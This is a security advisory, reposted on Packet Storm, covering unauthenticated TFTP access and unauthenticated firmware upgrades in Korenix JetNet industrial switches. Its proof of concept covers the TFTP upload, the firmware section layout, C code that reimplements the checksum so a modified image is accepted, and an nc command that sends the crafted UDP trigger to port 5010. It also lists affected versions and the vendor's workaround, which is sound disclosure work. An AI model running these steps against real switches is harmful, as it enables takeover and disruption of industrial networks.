what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Korenix JetNet Series Unauthenticated Access

Korenix JetNet Series Unauthenticated Access
Posted Jan 15, 2024
Authored by T. Weber, S. Dietz | Site cyberdanube.com

Korenix JetNet Series allows TFTP without authentication and also allows for unauthenticated firmware upgrades.

tags | exploit
advisories | CVE-2023-5347, CVE-2023-5376
SHA-256 | e98dce221232e53adca554fe3cd6ed0d46d0caac22afced67ae352d9d304056c

Korenix JetNet Series Unauthenticated Access

Change Mirror Download
CyberDanube Security Research 20240109-0
-------------------------------------------------------------------------------
title| Multiple Vulnerabilities
product| Korenix JetNet Series
vulnerable version| See "Vulnerable versions"
fixed version| -
CVE number| CVE-2023-5376, CVE-2023-5347
impact| High
homepage| https://www.korenix.com/
found| 2023-08-31
by| S. Dietz (Office Vienna)
| CyberDanube Security Research
| Vienna | St. Pölten
|
| https://www.cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"Korenix Technology, a Beijer group company within the Industrial Communication
business area, is a global leading manufacturer providing innovative, market-
oriented, value-focused Industrial Wired and Wireless Networking Solutions.
With decades of experiences in the industry, we have developed various product
lines [...].

Our products are mainly applied in SMART industries: Surveillance, Machine-to-
Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer
base covers different Sales channels, including end-customers, OEMs, system
integrators, and brand label partners. [...]"

Source: https://www.korenix.com/en/about/index.aspx?kind=3


Vulnerable versions
-------------------------------------------------------------------------------
Tested on emulated Korenix JetNet 5310G / v2.6

All vulnerable models/versions according to vendor:
JetNet 4508 (4508i-w V1.3, 4508 V2.3, 4508-w V2.3)
JetNet 4508f, 4508if (4508if-s V1.3,4508if-m V1.3, 4508if-sw V1.3,
4508if-mw V1.3, 4508f-m V2.3, 4508f-s V2.3, 4508f-mw V2.3,
4508f-sw V2.3)
JetNet 5620G-4C V1.1
JetNet 5612GP-4F V1.2
JetNet 5612G-4F V1.2
JetNet 5728G (5728G-24P-AC-2DC-US V2.1, 5728G-24P-AC-2DC-EU V2.0)
JetNet 528Gf (6528Gf-2AC-EU V1.0, 6528Gf-2AC-US V1.0, 6528Gf-2DC24 V1.0,
6528Gf-2DC48 V1.0, 6528Gf-AC-EU V1.0, 6528Gf-AC-US V1.0)
JetNet 6628XP-4F-US V1.1
JetNet 6628X-4F-EU V1.0
JetNet 6728G (6728G-24P-AC-2DC-US V1.1, 6728G-24P-AC-2DC-EU V1.1)
JetNet 6828Gf (6828Gf-2DC48 V1.0, 6828Gf-2DC24 V1.0, 6828Gf-AC-DC24-US V1.0,
6828Gf-2AC-US V1.0, 6828Gf-AC-US V1.0, 6828Gf-2AC-AU V1.0,
6828Gf-AC-DC24-EU V1.0, 6828Gf-2AC-EU V1.0)
JetNet 6910G-M12 HVDC V1.0
JetNet 7310G-V2 2.0
JetNet 7628XP-4F-US V1.0, 7628XP-4F-US V1.1, 7628XP-4F-EU V1.0,
7628XP-4F-EU V1.1
JetNet 7628X-4F-US V1.0, 7628X-4F-EU V1.0
JetNet 7714G-M12 HVDC V1.0


Vulnerability overview
-------------------------------------------------------------------------------
1) TFTP Without Authentication (CVE-2023-5376)
The available tftp service is accessable without user authentication. This
allows the user to upload and download files to the restricted "/home" folder.

2) Unauthenticated Firmware Upgrade (CVE-2023-5347)
A critical security vulnerability has been identified that may allow an
unauthenticated attacker to compromise the integrity of a device or cause a
denial of service (DoS) condition. This vulnerability resides in the firmware
upgrade process of the affected system.


Proof of Concept
-------------------------------------------------------------------------------
1) TFTP Without Authentication (CVE-2023-5376)
The Linux tftp client was used to upload a firmware to the absolute path
"/home/firmware.bin":

# tftp $IP
tftp> put exploit.bin /home/firmware.bin
Sent 5520766 bytes in 5.7 seconds


2) Unauthenticated Firmware Upgrade (CVE-2023-5347)
Unauthenticated attackers can exploit this by uploading malicious firmware via
TFTP and initializing the upgrade process with a crafted UDP packet on port
5010.

We came to the conclusion that the firmware image consists of multiple
sections. Our interpretation of these can be seen below:

===============================================================================
class FirmwarePart:
def init(self, name, offset, size):
self.name = name
self.offset = offset
self.size = size

firmware_parts = [
FirmwarePart("uimage_header", 0x0, 0x40),
FirmwarePart("uimage_kernel", 0x40, 0x3c54),
FirmwarePart("gzip", 0x3c94, 0x14a000 - 0x3c94),
FirmwarePart("squashfs", 0x14a000, 0x539000 - 0x14a000),
FirmwarePart("metadata", 0x539000, 5480448 - 0x539000),
]
===============================================================================

The squashfs includes the rootfs. Metadata includes a 4 byte checksum which
needs to be modified when repacked. During our analysis we observed that the
checksum gets calculated over all sections except metadata. To test this
vulnerability we reimplemented the checksum calculation at offset 0x9bdc in
the binary "/bin/cmd-server2":

===============================================================================
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int32_t check_file(const char* arg1) {
FILE* r0 = fopen(arg1, "rb");

if (!r0) {
return 0xffffffff;
}

int32_t filechecksum = 0;
int32_t last_data_size = 0;
int32_t file_size = 0;
uint8_t data_buf[4096];
int32_t data_len = 1;

while (data_len > 0) {
data_len = fread(data_buf, 1, sizeof(data_buf), r0);

if (data_len == 0) {
break;
}

int32_t counter = 0;
while (counter < (data_len >> 2)) {
int32_t byte_at_counter = *((int32_t*)(data_buf + (counter << 2)));
counter++;
filechecksum += byte_at_counter;
}

file_size += data_len;
last_data_size = data_len;
}

fclose(r0);

if (last_data_size < 0x400 || (last_data_size >= 0x400 && (file_size - 0x14a
000) > 0x5ac000)) {
return 0xffffffff;
}

data_len = 0;
while (data_len < (last_data_size >> 2)) {
int32_t r3_2 = *((int32_t*)(data_buf + (data_len << 2)));
data_len++;
filechecksum -= r3_2;
}

return filechecksum;
}

int main(int argc, char* argv[]) {
if (argc != 2) {
printf("Usage: %s <file_path>\n", argv[0]);
return 1;
}

int32_t result = check_file(argv[1]);
printf("0x%x\n", result);

return 0;
}
===============================================================================

After modifying and repacking the squashfs, we calculated the checksum,
patched the required bytes in the metadata section (offset 0x11b-0x11e) and
initilized the update process.

===============================================================================
# tftp $IP
tftp> put exploit.bin /home/firmware.bin
Sent 5520766 bytes in 5.7 seconds

# echo -e "\x00\x00\x00\x1f\x00\x00\x00\x01\x01" | nc -u $IP 5010
===============================================================================

The output of the serial console can be observed below:
===============================================================================
Jan 1 00:01:00 Jan 1 00:01:00 syslog: UDP cmd is received
Jan 1 00:01:00 Jan 1 00:01:00 syslog: management vlan = sw0.0
Jan 1 00:01:00 Jan 1 00:01:00 syslog: setsockopt(SO_BINDTODEVICE) No such devi
Jan 1 00:01:00 Jan 1 00:01:00 syslog: tlv_count = 0
Jan 1 00:01:00 Jan 1 00:01:00 syslog: rec_bytes = 10
Jan 1 00:01:00 Jan 1 00:01:00 syslog: command TLV_FW_UPGRADE received
check firmware...
checksum=b2256313, inFileChecksum=b2256313
Firmware upgrading, don't turn off the switch!
Begin erasing flash:
.
Write firmware.bin (5480448 Bytes) to flash:
...
Write finished...
Terminating child processes...
Jan 1 00:01:01 Jan 1 00:01:01 syslog: first time create tlv_chain
Jan 1 00:01:01 syslogd exiting
Firmware upgrade success!!
waiting for reboot command .......
===============================================================================

The vulnerabilities were manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).


Solution
-------------------------------------------------------------------------------
Beijer/Korenix provided a workaround to mitigate the vulnerabilities until a
proper patch is available (see "Workaround" section).


Workaround
-------------------------------------------------------------------------------
Beijer representatives provided the following workaround for mitigating the
vulnerabilities on devices of the JetNet series:
"Login by terminal:

Switch# configure terminal

Switch(config)# service ipscan disable

Switch(config)# tftpd disable

Switch(config)# copy running-config startup-config
"
Source: https://www.beijerelectronics.com/en/support/Help___online?docId=69947

This commands should be used to deactivate the TFTP daemon on the device to
prevent unauthenticated actors from abusing the service.

Recommendation
-------------------------------------------------------------------------------
Regardless to the current state of the vulnerability, CyberDanube recommends
customers from Korenix to upgrade the firmware to the latest version available.
Furthermore, a full security review by professionals is recommended.


Contact Timeline
-------------------------------------------------------------------------------
31-08-2023: Contacting Beijer Electronics Group via cs@beijerelectronics.com.
31-08-2023: Receiving contact information. Send vulnerability information.
26-09-2023: Asking about vulnerability status and receiving update release date.
27-10-2023: Received update from contact regarding the firmware update.
29-11-2023: Meeting with contact stating that it effects the whole series.
31-11-2023: Meeting to discuss potential solutions.
11-12-2023: Release delayed due to lack of workaround from manufacturer.
21-12-2023: Manufacturer provides workaround. Release date confirmed.
09-01-2024: Coordinated release of security advisory.

Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF Sebastian Dietz / @2024

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close